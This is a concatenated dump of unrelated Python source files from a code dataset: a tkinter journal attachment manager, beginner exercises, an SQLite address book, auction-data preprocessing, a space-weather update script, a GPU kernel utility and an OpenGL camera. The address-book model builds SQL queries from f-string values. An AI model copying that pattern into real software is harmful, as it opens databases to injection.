/select, ' + '\"\"' + path + '\"\"')\n else:\n for item in attachments:\n self.entry.deleteAttachment(item)\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n self.DISPLAY.config(state=tk.DISABLED)\n else:\n self.currentpath = path\n check = self.scanForAdditions()\n if check:\n attachments = self.entry.getAttachments()\n self.DISPLAY.config(state=tk.NORMAL)\n for filename in attachments:\n self.all_attachments.append(self.currentpath + \n filename)\n else:\n self.currentpath = self.temppath\n self.DISPLAY.config(state=tk.DISABLED)\n mkdir(self.currentpath) \n \n def addAttachment(self, pathtuple):\n for filepath in pathtuple:\n filepath = filepath.replace('/', '\\\\')\n if filepath not in self.all_attachments:\n self.all_attachments.append(filepath)\n copy(filepath, self.currentpath)\n# folder = listdir(self.currentpath)\n# entry = self.entry.getAttachments()\n# for file in folder:\n# if file not in entry:\n# self.entry.addAttachment(file)\n self.DISPLAY.config(state=tk.NORMAL)\n \n def askForAttachment(self):\n options = {}\n options['initialdir'] = self.currentpath\n options['parent'] = self.controller\n options['title'] = 'Select a file to add'\n items = filedialog.askopenfilenames(**options)\n if items:\n self.addAttachment(items)\n \n def scanForAdditions(self):\n \"\"\"[For later.] Allows manual addition of attachments that will be added \n to associated folder upon opening the JEntry.\"\"\"\n new = listdir(self.currentpath)\n old = self.entry.getAttachments()\n if old != new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n return True\n else:\n return False\n# self.updateGUI(self.entry)\n \n def displayAttachments(self):\n self.buttonlist = []\n \n if self.all_attachments:\n self.dialog = tk.Toplevel(bg=self.args['bgcolor1'])\n self.dialog.title('Attachments')\n self.dialog.iconbitmap(self.app_icon)\n self.dialog.maxsize(width=self.dialog.winfo_screenwidth(), \n height=self.dialog.winfo_screenheight())\n self.dialog.minsize(width=250, height=70)\n \n self.frame = ttk.Frame(self.dialog)\n bottomframe = ttk.Frame(self.dialog)\n \n for filepath in self.all_attachments:\n path = abspath(filepath)\n command = r'explorer /select, ' + '\"\"' + path + '\"\"'\n button = ttk.Button(self.frame, style='UI.TButton', \n text=filepath.rsplit('\\\\', 1)[1], \n command=lambda c=command: Popen(c))\n self.buttonlist.append([button, \n tk.BooleanVar(self.frame, False, \n button.cget('text')), \n path])\n button.pack(expand=1, fill='x', pady=2)\n self.DELETE = ttk.Button(bottomframe, takefocus=0, \n style='Bold.UI.TButton', \n text='Delete', \n command=self.deleteAttachment)\n self.DELETE.pack(side='right', expand=True, fill='x')\n self.frame.pack(side='top')\n bottomframe.pack(side='top', pady=4)\n self.dialog.grab_set()\n \n self.dialog.protocol('WM_DELETE_WINDOW', self.destroyDialog)\n \n else:\n message = \"There are no attachments for this entry!\"\n messagebox.showinfo(title='Attachments', message=message)\n \n def deleteAttachment(self):\n for item in self.frame.pack_slaves():\n item.pack_forget()\n self.dialog.title('Delete')\n \n for item in self.buttonlist:\n checkbutton = ttk.Checkbutton(self.frame, \n text=item[0].cget('text'), \n var=item[1])\n checkbutton.pack(side=tk.TOP, expand=True, fill=tk.X, pady=2)\n \n w = self.DELETE.winfo_width()\n h = self.DELETE.winfo_height()\n if not self.delete_icon:\n# iconpath = self.parentpath.rsplit('\\\\Attachments',1)[0] + \\\n# '\\\\Resources\\\\Trash_Can-512.png'\n self.delete_icon = PI.open(self.trashcan)\n self.delete_icon.thumbnail((h-2,h-2))\n self.delete_icon = ImageTk.PhotoImage(self.delete_icon)\n self.DELETE.config(command=self.refreshDialog, text='', \n image=self.delete_icon, width=w)\n self.DELETE.pack()\n\n def delete(self):\n \"\"\"Deletes the folder associated with the entry.\"\"\"\n try:\n items = listdir(self.currentpath)\n for item in items:\n remove(self.currentpath + item)\n rmdir(self.currentpath)\n except FileNotFoundError:\n pass\n \n def refreshDialog(self):\n deletelist = []\n for i in range(len(self.buttonlist)):\n button = self.buttonlist[i]\n if button[1].get():\n deletelist.append(i)\n if deletelist:\n if len(deletelist) > 1:\n message = \"This will delete previously saved attachments from your journal storage.\"\\\n \" If you want to keep any of the attachments, press \\\"Cancel\\\" and copy \"\\\n \"them elsewhere. Then, return here to finish deleting.\\n\\n\"\\\n \"Are you sure you want to delete them?\"\n else:\n message = \"This will delete the selected attachment from your \"\\\n \"computer. If you want to keep the attachment, press \\\"Cancel\\\" \"\\\n \"and copy the attachment elsewhere. Then, return here to \"\\\n \"delete it.\\n\\n Are you sure you want to delete it?\"\n choice = messagebox.askokcancel(title='Are You Sure?', message=message)\n if choice:\n for d in deletelist:\n path = self.buttonlist[d][2]\n# filename = self.buttonlist[d][0].cget('text')\n# filepath = abspath(self.currentpath+filename)\n# if filepath == self.buttonlist[d][2]:\n# try:\n# remove(filepath)\n# except FileNotFoundError:\n# pass\n# if filepath in self.old_attachments:\n# self.old_attachments.remove(filepath)\n# else:\n# filepath = self.buttonlist[d][2]\n# if filepath in self.new_attachments:\n# self.new_attachments.remove(filepath)\n try:\n remove(path)\n except FileNotFoundError:\n pass\n self.entry.deleteAttachment(filename = \n self.buttonlist[d][0].cget('text'))\n self.all_attachments.remove(path)\n self.destroyDialog()\n \n def destroyDialog(self):\n self.dialog.destroy()\n self.dialog = None\n self.frame = None\n for item in self.buttonlist:\n item[0].destroy()\n self.buttonlist = None\n if not self.all_attachments:\n self.delete()\n self.updateGUI(self.entry)\n# self.DISPLAY.config(state=tk.DISABLED)\n# rmdir(self.currentpath)\n \n def clearGUI(self, jentry):\n self.entry = jentry\n self.all_attachments = []\n self.currentpath = self.temppath\n self.delete()\n# mkdir(self.currentpath)\n# self.new_attachments = []\n \n def save(self):\n \"\"\"Saves the attachments and renames the 'temp' folder to the date.\n Has exclusive control over generation of JEntry-associated folders.\n Assumes that the JEntry object already has a date\"\"\"\n src = self.temppath\n date = self.entry.getDate()\n dest = self.parentpath + DT.getDateFileStorageFormat(date)\n# tmp = False\n old = self.entry.getAttachments()\n# if not old:\n if exists(src):\n# tmp = True\n new = listdir(src)\n if new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n rename(src, dest)\n else:\n folder = listdir(dest)\n for file in folder:\n if file not in old:\n self.entry.addAttachment(file)\n# self.delete()\n# src = self.currentpath\n# if new and tmp:\n \n# if self.all_attachments:\n# try:\n# mkdir(path)\n# except FileExistsError:\n# pass\n# for filepath in self.new_attachments:\n# copy(filepath, path)\n# f = filepath.rsplit('\\\\',1)[1]\n# self.entry.addAttachment(f)\n# tmp = self.entry.getAttachments()\n# self.old_attachments = []\n# for filename in tmp:\n# self.old_attachments.append(self.currentpath+filename) \n# self.new_attachments = []\n\n def clean(self):\n self.currentpath = self.temppath\n if exists(self.currentpath):\n check = listdir(self.currentpath)\n if check:\n message = 'There are files left in ' + self.currentpath + '. If you wish to '\\\n 'move them, do so before clicking \\\"OKAY\\\".'\n messagebox.showwarning(title='Unsaved files', message=message)\n self.delete()","repo_name":"kozmik-moore/kunnekted-jurnl","sub_path":"AttachmentTools.py","file_name":"AttachmentTools.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70636061610","text":"#factorial\r\ndef fact(n):\r\n f=1\r\n for i in range(1,n+1):\r\n f*=i\r\n return f\r\n\r\nn=int(input())\r\nr=int(input())\r\n\r\nn_fact=fact(n)\r\nr_fact=fact(r)\r\nnr_fact=fact((n-r))\r\nc=n_fact//(r_fact*nr_fact)\r\nprint(c)\r\n\r\n #prime no\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\nn=int(input())\r\na=isprime(n)\r\nif a:\r\n print(\"Prime\")\r\nelse:\r\n print(\"Not Prime\")\r\n\r\n#all prime no b/w 2 to n\r\nn=int(input())\r\nfor i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i,\" Prime\")\r\n else:\r\n print(i,\" Not Prime\")\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n for j in range(2,i):\r\n if i%j==0:\r\n break\r\n else:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)","repo_name":"AbhisheKumar1616/Introduction-to-Python","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36424990103","text":"\"\"\" Python modules\n logging: logs\n geodesic: distance between 2 points\n\"\"\"\nimport logging\nimport sqlite3\nfrom geopy.distance import geodesic\n\n\nfrom src.db_connection import database_connection_cursor\n\nlogging.basicConfig(level=logging.INFO, filename=\"logs/db_connection.log\",\n format=\" %(asctime)s - %(levelname)s - %(message)s\")\n\n\n# Connecting database and receiving conn and cursor object\ndb_conn, db_curr = database_connection_cursor()\n\n\nclass Address:\n \"\"\"\n Address class for UserAddress\n \"\"\"\n def __init__(self, address_name=None, coordinates=None):\n self.address_name = address_name\n self.coordinates = coordinates\n\n def create_address(self):\n \"\"\"\n Method to create/add address into Database\n Error Convention:\n 1500: same address_name\n \"\"\"\n\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n if self.address_name in addrs:\n return 1500\n\n del addrs\n\n query = f\"\"\" INSERT INTO address_book VALUES\n ('{self.address_name}','{self.coordinates}')\"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def delete_address(self, query_address_name):\n \"\"\"Method to delete a address in the DB by name\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n\n for addr in ids:\n addrs.add(addr[0])\n\n if query_address_name not in addrs:\n return False\n del addrs\n\n query = f\"\"\"\n DELETE FROM address_book WHERE\n address_name ='{query_address_name}';\n \"\"\"\n try:\n db_curr.execute(query)\n self.commit()\n return True\n except sqlite3.Error as err:\n logging.error(err)\n\n def update_address(self):\n \"\"\"Method to update a address in the DB\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n\n if self.address_name not in addrs:\n return 1500\n\n del addrs\n query = f\"\"\"\n UPDATE address_book\n SET coordinates = '{self.coordinates}'\n WHERE address_name = '{self.address_name}';\n \"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def get_address_in_range(self, rang, location):\n \"\"\"\n Method to get the addresses within the given distance\n and location from sqlite database\n\n \"\"\"\n location = location.split(\",\")\n latitude = float(location[0].strip())\n longitude = float(location[1].strip())\n\n point = (latitude, longitude)\n\n addresses_within_range = []\n all_addresses = self.get_address_ids()\n\n for address in all_addresses:\n address_point = address[1].split(\",\")\n address_point = (float(address_point[0]), float(address_point[1]))\n\n diff = geodesic(point, address_point)\n logging.info(f\"Location:{location}\")\n logging.info(f\"Address point: {address_point} -- \\\n Range:{range} -- Difference: {diff}\")\n\n if diff <= rang:\n addresses_within_range.append(address)\n\n return addresses_within_range\n\n @staticmethod\n def commit():\n \"\"\"\n Method to commit the changes done on the database\n\n \"\"\"\n db_conn.commit()\n\n @staticmethod\n def close():\n \"\"\"\n Method to close the database connection\n \"\"\"\n db_conn.close()\n\n @staticmethod\n def get_address_ids():\n \"\"\"\n Method to get all the address names present in the DB\n \"\"\"\n try:\n db_curr.execute(\"\"\"SELECT address_name, coordinates\n FROM address_book;\"\"\")\n rows = db_curr.fetchall()\n return rows\n except sqlite3.Error as err:\n logging.error(err)\n","repo_name":"mallik18/AddressBook","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31171169831","text":"def ficha(nome='', gol=0,):\n print( f'O jogador {nome} fez {gol} gol(s) no campeonato.')\n\n\nnomeJogador = str(input('Nome do jogador: '))\nnumGols = str(input('Número de gols: '))\nif numGols.isnumeric():\n numGols = int(numGols)\nelse:\n numGols = 0\nif nomeJogador.strip() == '':\n ficha(gol=numGols)\nelse:\n ficha(nomeJogador, numGols)\n","repo_name":"Nadirlene/Exercicios-python","sub_path":"Exerciciospython2/Função 02/e103.py","file_name":"e103.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6334152351","text":"\"\"\"\nDefine the method to parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\"\n\"\"\"\n\nimport Shared as sd\n\nformats_ = [16, 31, 9, 12, 14, 3, 2, 7, 5, 21, 8, 20, 15, 6, 22, 27, 25, 26, 30, 13, 23]\n\n# (\"w\", \"h\") is set to (-1, -1) to indicate missing banners\nbanners_ = [(300, 250), (728, 90), (160, 600), (320, 50), (300, 600), (970, 90), (468, 60), (234, 60),\n (13, 13), (12, 12), (17, 17), (18, 18), (10, 10), (300, 120), (16, 16), (250, 100), (19, 19), (320, 480),\n (250, 70), (0, 0), (450, 100), (21, 21), (20, 20), (400, 400), (300, 100), (-1, -1)]\n\n\ndef process(margin, entry, result, mode):\n \"\"\"\n Given a JSON object formatted by Extractor.py, parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\",\n and the results to the list of possible results.\n :param entry: the JSON object that represents one impression\n :param result: the list of possible results\n :return: None\n \"\"\"\n\n # Auction - Bidrequests - bidder id\n bidder_id = entry[\"bidderid\"]\n if bidder_id == 36: # Adjusting the index for DSP 36 since we ignore DSP 35 and 37\n bidder_id = 35\n sd.binarize(result, bidder_id-1, 35)\n\n # Auction - Bidrequests - vertical id\n sd.binarize(result, entry[\"verticalid\"]-1, 16)\n\n # Auction - Bidrequests - Impressions - bid Floor\n bid_floor = round(float(entry[\"bidfloor\"]), 2)\n\n if bid_floor-margin == 0:\n result.append(0)\n else:\n result.append(1)\n\n # If bid floor is to be parsed into binary format, create a boolean variable for every interval of size 0.5 from 0 to 28,\n # and according to the value of the bid floor, set the associated boolean variable to 1.\n # Otherwise, just record the value of bid floor.\n if mode == \"bin\":\n index = 0\n if bid_floor < 28:\n index = int(bid_floor*20)\n bid_floor_list = [0]*560\n bid_floor_list[index] = 1\n result.extend(bid_floor_list)\n else:\n result.append(bid_floor)\n\n # Determine if bid floor is a multiple of 0.05 or of 0.1\n for n in [20, 10]:\n bid_floor_tmp = n*bid_floor\n if bid_floor_tmp == int(bid_floor_tmp):\n result.append(1)\n else:\n result.append(0)\n\n # Determine if bid floor is greater than the values in thres_list\n index = 0\n thres_list = [1.5, 2, 2.5, 3, 28]\n for thres in thres_list:\n if bid_floor > thres:\n result.append(1)\n index += 1\n else:\n n = len(thres_list) - index\n result.extend([0]*n)\n break\n\n # Auction - Bidrequests - Impressions - format\n sd.binarize(result, formats_.index(entry[\"format\"]), len(formats_))\n\n # Auction - Bidrequests - Impressions - product\n sd.binarize(result, entry[\"product\"]-1, 6)\n\n # Auction - Bidrequests - Impressions - banner\n width = entry[\"w\"]\n height = entry[\"h\"]\n\n # Determine if banner belongs to any of the following types:\n # 1) h in (0, 200] and w in (0, 500]\n # 2) h in (0, 200] and w in (500, infinity)\n # 3) h in (200, infinity) and w in (0, 500]\n banner_cat = [0, 0, 0]\n if 0 < height <= 200:\n if 0 < width <= 500:\n banner_cat[0] = 1\n elif width > 500:\n banner_cat[1] = 1\n elif (height > 200) and (width <= 500):\n banner_cat[2] = 1\n\n sd.add_to_result(result, (width, height), banners_)\n result.extend(banner_cat)\n\n\ndef get_hearder():\n \"\"\"\n Return the names of features extracted in this section, and the number of variables used to represent each feature.\n :return: a list of tuples containing the feature names and the lengths of the corresponding features\n \"\"\"\n bidder_id = (\"bidder_id\", 35)\n vertical_id = (\"vertical_id\", 16)\n bid_floor = (\"bid_floor\", 9)\n format = (\"format\", len(formats_))\n product = (\"product\", 6)\n banner = (\"banner\", 3+len(banners_)+1)\n\n return [bidder_id, vertical_id, bid_floor, format, product, banner]","repo_name":"wlu673/gumgum","sub_path":"Preprocessing/Auction_BidRequests.py","file_name":"Auction_BidRequests.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39486565186","text":"def Set_equal_dimensions_2_IQ(vect1,vect2):\n\t##this fuction adds 0 to the shorter array in order to \n\t## have same dimension in both arrays\n\tlen1 = len(vect1)\n\tlen2 = len(vect2)\n\tif(len1>len2):\n\t\tfor i in range(len1-len2):\n\t\t\tvect2.append(0)\n\tif(len2>len1):\n\t\tfor i in range(len2-len1):\n\t\t\tvect2.append(0)\n\n\treturn(vect1,vect2)\n\n\ndef operating_array(vect1,vect2,operation):\n\tif(operation==\"dot product\"):\n\t\tdotProduct=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tdotProduct.append(vect1[i]*vect2[i])\n\t\treturn dotProduct\n\telif(operation==\"substraction\"):\n\t\tSubstraction=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tSubstraction.append(vect1[i]-vect2[i])\n\t\treturn Substraction\n\telif(operation==\"sumation\"):\n\t\tSum=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tsum.append(vect1[i]+vect2[i])\n\t\treturn Sum","repo_name":"bobinaman/SDR_NASA","sub_path":"Math_Functions.py","file_name":"Math_Functions.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9635325832","text":"#!/proj/sot/ska3/flight/bin/python\n\n#####################################################################################################\n# #\n# update_solor_wind_data.py: copy kp data and create a file to match in the required format #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last updae: Mar 16, 2021 #\n# #\n#####################################################################################################\n\nimport os\nimport sys\nimport re\nimport string\nimport math\nimport numpy\nimport time\nfrom datetime import datetime\nfrom time import gmtime, strftime, localtime\nimport Chandra.Time\n\npath = '/data/mta4/Space_Weather/house_keeping/dir_list'\n\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n#for writing out files in test directory\nif (os.getenv('TEST') == 'TEST'):\n os.system('mkdir -p TestOut')\n test_out = os.getcwd() + '/TestOut'\n\n#---------------------------------------------------------------------------------------\n#-- get_kp: copy kp data and create a file to match in the required format --\n#---------------------------------------------------------------------------------------\n\ndef get_kp():\n \"\"\"\n copy kp data and create a file to match in the required format\n input: none but read from: /data/mta4/proj/rac/ops/KP/k_index_data\n output: /solar_wind_data.txt\n \"\"\"\n#\n#--- find out the last update time\n#\n data_dir = kp_dir + 'Data/'\n\n datafilep = data_dir + '/solar_wind_data_past.txt'\n datafile = data_dir + '/solar_wind_data.txt'\n odata = read_data_file(datafilep)\n at = re.split('\\s+', odata[-1])\n otime = at[0] + ':' + at[1] + ':' + at[2] + ':' + at[3][0] \n otime = otime + at[3][1] + ':' + at[3][2] + at[3][3] + ':00'\n otime = datetime.strptime(otime, \"%Y:%m:%d:%H:%M:%S\").strftime(\"%Y:%j:%H:%M:%S\")\n otime = Chandra.Time.DateTime(otime).secs\n#\n#--- read kp data file\n#\n ifile = kp_dir + 'Data/k_index_data_past'\n data = read_data_file(ifile)\n#\n#--- find the part which are not in the data\n#\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n l_time = ltime\n if ltime > otime:\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafilep\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n fo = open(appendfile, 'a')\n fo.write(line)\n fo.close()\n\n cmd = 'cp -f ' + datafilep + ' ' + datafile\n os.system(cmd)\n else:\n exit(1)\n#\n#--- add predictive kp data file\n#\n ifile = kp_dir + 'Data/k_index_data'\n data = read_data_file(ifile)\n\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n if ltime <= l_time:\n continue\n\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafile\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n with open(appendfile, 'a') as fo:\n fo.write(line)\n\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n\ndef read_data_file(ifile):\n\n with open(ifile, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\n return data\n\n#---------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n get_kp()\n\n","repo_name":"chandra-mta/Space_Weather_New","sub_path":"KP/Scripts/update_solor_wind_data.py","file_name":"update_solor_wind_data.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"402199359","text":"# calculate dist between 2 points\ndef getDist(p1, p2):\n return (p2[0] - p1[0])**2 + (p2[1] - p1[1])**2\n\n# permutations of nP2\n\n\ndef getCount(n):\n return n * (n - 1)\n\n# logic is to keep track of number of pairs which has the same distance between them\n# then boomerang count will be nP2 of that pair count\n\n# O(N^2)\n\n\ndef numberOfBoomerangs(points) -> int:\n n = len(points)\n boomCount = 0\n distFreq = dict()\n for i in range(n):\n distFreq.clear()\n for j in range(n):\n if j == i:\n continue\n\n d = getDist(points[i], points[j])\n if d not in distFreq:\n distFreq[d] = 1\n else:\n distFreq[d] += 1\n\n for v in distFreq.values():\n boomCount += getCount(v)\n\n return boomCount\n\n\np = [[0, 0], [1, 0], [-1, 0], [0, 1], [0, -1]]\nprint(numberOfBoomerangs(p))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Goldman_Sachs_2/BoomerangCount.py","file_name":"BoomerangCount.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19817992550","text":"import os\nimport pathlib\nimport re\nimport shutil\nimport tempfile\n\nfrom aitemplate.backend import registry\n\n# from . import extra_conv_emit, extra_cutlass_generator, extra_enum\n\n# pylint: disable=C0103,C0415,W0707\n\n\nclass Args:\n def __init__(self, arch):\n self.operations = \"all\"\n self.build_dir = \"\"\n self.curr_build_dir = \"\"\n self.rocm_version = \"5.0.2\"\n self.generator_target = \"\"\n self.architectures = arch\n self.kernels = \"all\"\n self.ignore_kernels = \"\"\n self.kernel_filter_file = None\n self.selected_kernel_list = None\n self.interface_dir = None\n self.filter_by_cc = True\n\n\n@registry.reg(\"rocm.make_ck_lib\")\ndef mk_ck_lib(src_prefix, dst_prefix=None):\n if dst_prefix is None:\n dst_prefix = tempfile.mkdtemp()\n lib_dst = os.path.join(dst_prefix, \"ck_lib\")\n if pathlib.Path(lib_dst).is_dir():\n shutil.rmtree(lib_dst)\n\n os.makedirs(lib_dst)\n with open(os.path.join(lib_dst, \"__init__.py\"), \"w\") as fo:\n fo.write(\"from . import library\\n\")\n fo.write(\"from . import generator\\n\")\n fo.write(\"from . import manifest\\n\")\n fo.write(\"from . import gemm_operation\\n\")\n fo.write(\"from . import conv2d_operation\\n\")\n\n def process_code(src_path, dst_path, code_set):\n pattern = re.compile(r\"from\\s([a-z_0-9]+)\\simport \\*\")\n with open(src_path) as fi:\n lines = fi.readlines()\n output = []\n\n for line in lines:\n match = pattern.match(line)\n if match is not None:\n name = match.groups()[0]\n if name + \".py\" in code_set:\n line = \"from .{name} import *\\n\".format(name=name)\n output.append(line)\n # if \"library.py\" in dst_path:\n # lines = extra_enum.emit_library()\n # output.append(lines)\n # if \"conv2d_operation.py\" in dst_path:\n # lines = extra_conv_emit.emit_library()\n # output.append(lines)\n with open(dst_path, \"w\") as fo:\n fo.writelines(output)\n\n srcs = os.listdir(src_prefix)\n for file in srcs:\n src_path = os.path.join(src_prefix, file)\n if not os.path.isfile(src_path):\n continue\n dst_path = os.path.join(lib_dst, file)\n process_code(src_path, dst_path, srcs)\n\n # extra configs\n # dst_path = os.path.join(lib_dst, \"extra_operation.py\")\n # with open(dst_path, \"w\") as fo:\n # code = extra_ck_generator.emit_library()\n # fo.write(code)\n return dst_prefix\n\n\n@registry.reg(\"rocm.gen_ck_ops\")\ndef gen_ops(arch):\n import ck_lib\n\n args = Args(arch)\n manifest = ck_lib.manifest.Manifest(args)\n try:\n func = getattr(ck_lib.generator, \"Generate\" + arch.upper())\n func(manifest, args.rocm_version)\n except AttributeError as exc:\n raise NotImplementedError(\n \"Arch \" + arch + \" is not supported by current cklib lib.\"\n ) from exc\n return manifest.operations\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/backend/rocm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"3119979059","text":"from __future__ import division\r\n\r\nfrom math import sin, cos\r\n\r\nfrom OpenGL import GL as gl, GLU as glu\r\n\r\n\r\nclass Camera(object):\r\n\r\n def __init__(self, x=0.0, y=0.0, zoom=10.0):\r\n self.x = x\r\n self.y = y\r\n self.zoom = zoom\r\n self.angle = 0.0\r\n\r\n def world_projection(self, width, height):\r\n '''\r\n Screen's shortest dimension (usually height) will show exactly\r\n self.zoom of the world in each direction from the center of the screen,\r\n regardless of screen resolution\r\n '''\r\n aspect = width / height\r\n\r\n def getOrtho2DBounds():\r\n left = bottom = -self.zoom\r\n right = top = self.zoom\r\n if width > height: # widescreen\r\n left *= aspect\r\n right *= aspect\r\n elif width < height: # tallscreen\r\n bottom /= aspect\r\n top /= aspect\r\n return left, right, bottom, top\r\n\r\n gl.glMatrixMode(gl.GL_PROJECTION)\r\n gl.glLoadIdentity()\r\n glu.gluOrtho2D(*getOrtho2DBounds())\r\n\r\n\r\n def look_at(self):\r\n gl.glMatrixMode(gl.GL_MODELVIEW)\r\n gl.glLoadIdentity()\r\n glu.gluLookAt(\r\n self.x, self.y, +1.0,\r\n self.x, self.y, -1.0,\r\n sin(self.angle), cos(self.angle), 0.0)\r\n\r\n","repo_name":"tartley/pyong","sub_path":"pyong/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19990370437","text":"from functools import partial\r\nimport multiprocessing\r\nimport os\r\nfrom abc import ABC, abstractmethod\r\nfrom dataclasses import dataclass, field\r\nfrom enum import Enum\r\nfrom math import ceil, floor\r\nfrom pathlib import Path\r\nfrom typing import Callable, Self\r\n\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nfrom numpy import typing as npt\r\nfrom scipy.signal import cwt, find_peaks, ricker\r\nfrom src.config import AnomalyConfig, load_config\r\n\r\nfrom copy import deepcopy\r\n\r\nPEAK_COLOR = \"r\"\r\n\r\n\r\nclass AnomalyType(str, Enum):\r\n max = \"max\"\r\n min = \"min\"\r\n line = \"line\"\r\n peak_count = \"peaks\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\nclass SignalType(str, Enum):\r\n icp = \"ICP\"\r\n abp = \"ABP\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\n@dataclass()\r\nclass Anomaly(ABC):\r\n start: float\r\n end: float\r\n\r\n @abstractmethod\r\n def extend(self, other: Self):\r\n ...\r\n\r\n def overlap(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n \"\"\"\r\n measuring overlapping area\r\n\r\n Args:\r\n other (Self): other measuret segment\r\n\r\n Returns:\r\n float: overlapped area relative to other\r\n \"\"\"\r\n # if self.end < other.start or other.end < self.start:\r\n # return 0\r\n if self.start < other.start or self.end > other.end:\r\n self,other = other, self # type: ignore\r\n if other.length() == 0:\r\n if self.start <= other.start and self.end >= other.end:\r\n return 1\r\n return 0\r\n if self.end <= other.start or self.start >= other.end : # check if the there is so overlap\r\n return 0\r\n return max((min(self.end,other.end) - max(other.start,self.start)) / other.length(),0)\r\n \r\n def distance(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n if self.overlap(other) > 0:\r\n return 0\r\n return max(self.start, other.start) - min(self.end, other.end)\r\n\r\n def length(self) -> float:\r\n return max(self.end - self.start, 0) \r\n\r\n\r\n@dataclass\r\nclass 